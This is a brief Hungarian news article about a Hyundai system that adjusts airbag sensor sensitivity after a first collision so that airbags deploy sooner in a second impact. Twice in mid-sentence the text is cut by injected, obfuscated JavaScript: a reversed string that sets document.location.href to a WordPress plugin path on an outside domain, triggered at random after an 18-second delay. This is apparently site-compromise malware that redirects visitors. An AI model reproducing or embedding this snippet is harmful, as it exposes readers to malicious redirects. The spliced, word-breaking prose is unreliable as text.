A balesetek 30 százalékában az elsődleges ütközést követi egy második, és ahogy egyre több autó lesz az utakon, úgy válik ez vélhetően egyre gyakoribbá. A Hyundai új technológiája azonban ilyen helyzetben is védelmet nyújt. A fő probléma, hogy míg az első ütközés előtt és során az utasok többé-kevésbé kiszámítható pozícióban foglalnak helyet, a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbiaknál már nehéz megjósolni, hogy merre és hogyan mozdul el testük. A rendszer ezért az első ütközést követően kiértékeli az utasok testhelyzetét és járművön belüli elhelyezkedését, és ehhez mérten áthangolja érzékelőinek érzékenységét. Így a légzsákok második hulláma akár jóval kisebb erőhatásra, azaz hamarabb nyílhat ki, így biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosítva…
- Hirdetés -